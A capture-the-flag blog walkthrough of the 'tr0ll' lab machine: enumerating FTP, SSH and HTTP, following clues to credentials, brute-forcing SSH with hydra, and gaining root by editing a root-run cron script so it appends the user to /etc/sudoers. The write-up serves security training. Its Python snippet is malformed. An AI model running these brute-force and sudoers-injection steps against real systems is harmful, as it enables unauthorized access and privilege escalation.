Back to Posts


Posted in CTF

Networks Engineered to Exploit.
- Windows/UNIX - Domains/Subnets - Initial/Post/Lateral - Low Cost VPN Ranges -


Our initial scan yields:

21/tcp open  ftp     vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx    1 1000     0            8068 Aug 10  2014 lol.pcap [NSE: writeable]
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA)
|   2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA)
|   256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA)
|_  256 b2:8b:e2:46:5c:ef:fd:dc:72:f7:10:7e:04:5f:25:85 (EdDSA)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-methods: 
|_  Supported Methods: OPTIONS GET HEAD POST
| http-robots.txt: 1 disallowed entry 
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).

We’ll enumerate these 3 services to get a good understanding of possible vectors, increasing our attack surface and reducing time wasted in rabbit holes.

  • FTP
  • SSH
  • HTTP


Starting with FTP we can verify that it actually is FTP, vsftp service and allows anonymous login.

root@kali:/usr/share/nmap/scripts# nmap -sV
root@kali:/usr/share/nmap/scripts# nmap --script ftp-anon.nse -p21

Our inital scan was correct. We can now anon FTP login to do some initial investigation.

root@kali:/home# ftp
Connected to
220 (vsFTPd 3.0.2)
Name ( anonymous
331 Please specify the password.
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        112          4096 Aug 10  2014 .
drwxr-xr-x    2 0        112          4096 Aug 10  2014 ..
-rwxrwxrwx    1 1000     0            8068 Aug 10  2014 lol.pcap
226 Directory send OK.

Trying to PUT or travese into other directories is futile, but all hope is not lost. We are able to capture a lone file of: lol.pcap

We are able to GET this file and save to our local machine. Before we commit to this vector, we’ll enumerate the other services - we can put this on the top or our todo list.


Since SSH is a common and relatively secure service, we won’t consider this a low hanging fruit.

We can verify the SSH service and check if root user accepts passwords (which it does).

root@kali:/# nmap -sV -p22
root@kali:/# ssh -vvv root@

We can try to brute force ssh as root, but we’ll put that near the end of the list.


Running Nikto a few things come up, but nothing real juicy.

  • Apache/2.4.7
  • OS: Ubuntu
  • 1 entry in robots.txt: /secret
  • Apache deafault README page
  • Two images with pages /index.html & /secret/index.html

We can use curl to verify headers and check if anything jumps out at us.

root@kali:/# curl -i -L
root@kali:/# curl -i -L
root@kali:/# curl -i -L

Nothing really. Let’s brute force some dirs.

root@kali:/# dirb
root@kali:/# gobuster -u -e -s '200,403,204,500' -w /usr/share/seclists/Discovery/Web_Content/apache.txt

Just what we’ve found from Nikto.

We can always run some larger wordlists to dig into the webserver more - we can put that on our todo list near the end as well.

Plan of Attack

  1. Investigate lol.pcap
  2. Brute force SSH with root or found usernames
  3. Run large wordlist (which we can do in the background)

We’ve download the lol.pcap file, which we can open up with wireshark.

Following this packet capture file by “TCP Stream” you can get an idea on what this file entails. Make sure to remove the filter to see the important part.

Well, well, well, aren't you just a clever little devil, you almost found the sup3rs3cr3tdirlol :-P

Sucks, you were so close... gotta TRY HARDER!

Going to gives us a dir listing with roflmao ELF file.

Dowloading it to our local machine, and digging into it, we see a hint..

root@kali:~/Downloads# file roflmao 
roflmao: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/, for GNU/Linux 2.6.24, BuildID[sha1]=5e14420eaa59e599c2f508490483d959f3d2cf4f, not stripped
root@kali:~/Downloads# strings roflmao 
Find address 0x0856BF to proceed
GCC: (Ubuntu 4.8.2-19ubuntu1) 4.8.2

Find address 0x0856BF to proceed. Using this string as a directory we find another list of files.

Two folders with two files. One looks like a good user list and the other folder “this_folder_contains_the_password” has a file of “Pass.txt” containing the string: Good_job_:)

Trying the newly created userlist (tru.txt) and the password string, should yield us a successful ssh login correct, or maybe via ftp..? Wrong (I tried)

Since the name of this machien is tr0ll, and we’ve seen it be sneaky previously, we can take a step back and look at the file directory. Nothing hidden in headers or source, but take a look at this again: this_folder_contains_the_password/

“this_folder” - so the string pass.txt would technically be it, right? We’ll see…

root@kali:/# hydra -t 7 -L /home/tru.txt -p Pass.txt ssh
[22][ssh] host:   login: overflow   password: Pass.txt

A successful hit overflow:Pass.txt

Logging in with the creds, we have a limited low priv shell. Going through the basic linux priv esc guide we get to a point where we can search for world writable folders.

$ find / -writable -type d 2>/dev/null

Nothing in the /tmp folder, but something in the /var/tmp folder. An app called (that aint stock) is somewhere with a hint to it being ran by root cron job every 2 minutes.

$ cd /var/log
$ cat cronlog
*/2 * * * *

So let’s try to find this cleaner python app. A basic locate or find command doesn’t bring us any luck. Using the below find command does yield something..

$ find / -name *cleaner* |grep

Looks like it’s located in /lib/log/ AND it’s world writable. Since it’s executed by root, we can alter the script to add our low priv user to the /etc/sudoers file.

#!/usr/bin/env python
import os
import sys
	os.system('echo "overflow ALL=(ALL:ALL) ALL" >> /etc/sudoers')

Save it, and wait the 2 minutes per cronlog then..

$ sudo su
sudo: unable to resolve host troll
[sudo] password for overflow: 
root@troll:~# whoami
root@troll:~# cat proof.txt 
Good job, you did it! 


Good stuff, we have root.

Custom Cyber Ranges >>

Read Next